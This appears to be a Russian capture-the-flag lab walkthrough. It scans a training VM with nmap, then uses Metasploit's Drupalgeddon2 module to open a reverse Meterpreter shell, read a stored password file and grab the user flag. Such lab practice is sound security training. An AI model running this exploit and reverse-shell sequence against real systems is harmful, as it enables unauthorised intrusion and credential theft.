Взлом виртуалки

# Взлом виртуалки ## sudo nmap -F 192.168.43.0/24 можно и arp-scan -l но будет без портов, sudo nmap -sP 192.168.43.0/24(ping) Nmap scan report for 192.168.43.76 Host is up (0.00091s latency). Not shown: 96 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 5000/tcp open upnp 8081/tcp open blackice-icecap ## sudo nmap -p1-65535 -sV -sC 192.168.43.76 Nmap scan report for 192.168.43.76 Host is up (0.00010s latency). Not shown: 65530 closed tcp ports (reset) PORT STATE SERVICE VERSION **22/tcp** open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8c:9f:7e:78:82:ef:76:f6:26:23:c9:52:6d:aa:fe:d0 (RSA) | 256 2a:e2:f6:d2:52:1c:c1:d0:3d:aa:40:e6:b5:08:1d:45 (ECDSA) |_ 256 fa:c9:eb:58:e3:d2:b7:4a:74:77:fc:69:0e:b6:68:08 (ED25519) **80/tcp** open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: W3.CSS Template **5000/tcp** open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-generator: WordPress 5.7.2 |_http-title: fsociety – Just another WordPress site **8081/tcp** open http nginx 1.14.0 (Ubuntu)! |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-generator: Joomla! - Open Source Content Management |_http-title: Home | http-robots.txt: 15 disallowed entries | /joomla/administrator/ /administrator/ /bin/ /cache/ | /cli/ /components/ /includes/ /installation/ /language/ |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/ **9001/tcp** open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-generator: Drupal 7 (http://drupal.org) |_http-title: fsociety.web ## Смотрим уязвимости по SSH, NGinx, Drupal 7 на https://www.exploit-db.com/ ![](https://i.imgur.com/tfTsoux.png) ## Идем в Metasploit search drupal 7 ![](https://i.imgur.com/Qpt3byf.png) описание уязвимости https://xakep.ru/2018/04/17/drupalgeddon-2/ msf6 > use 1 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > options msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.43.76 rhosts => 192.168.43.76 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 9001 rport => 9001 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lport 1234 lport => 1234 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit [*] Started reverse TCP handler on 192.168.43.220:1234 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. [*] Sending stage (39282 bytes) to 192.168.43.76 [*] Meterpreter session 1 opened (192.168.43.220:1234 -> 192.168.43.76:33628) at 2022-03-07 17:18:22 +0700 meterpreter > meterpreter >ls meterpreter >cd misc meterpreter > cat tyrell.pass Username: tyrell Password: mR_R0bo7_i5_R3@!_ meterpreter > pwd /var/www/html/drupal/misc meterpreter > cd / meterpreter > ls meterpreter > cd home meterpreter > ls Listing: /home Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40755/rwxr-xr-x 4096 dir 2021-08-05 17:33:30 +0700 elliot 40755/rwxr-xr-x 4096 dir 2021-06-01 11:29:12 +0700 ghost 40755/rwxr-xr-x 4096 dir 2021-08-05 17:33:51 +0700 tyrell meterpreter > cd tyrell meterpreter > ls Listing: /home/tyrell Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100600/rw------- 505 fil 2021-08-05 17:38:31 +0700 .bash_history 40700/rwx------ 4096 dir 2021-05-31 17:51:09 +0700 .cache 40700/rwx------ 4096 dir 2021-05-31 17:51:08 +0700 .gnupg 100600/rw------- 36 fil 2021-08-05 17:33:51 +0700 .lesshst 100644/rw-r--r-- 0 fil 2021-05-31 17:54:01 +0700 .sudo_as_admin_successful 100600/rw------- 2540 fil 2021-08-05 17:33:30 +0700 .viminfo 100664/rw-rw-r-- 35 fil 2021-08-05 17:25:05 +0700 tyrell.txt meterpreter > cat tyrell.txt HackerU{Y0u_v3_g0T_Th3_U53rs_FLaG}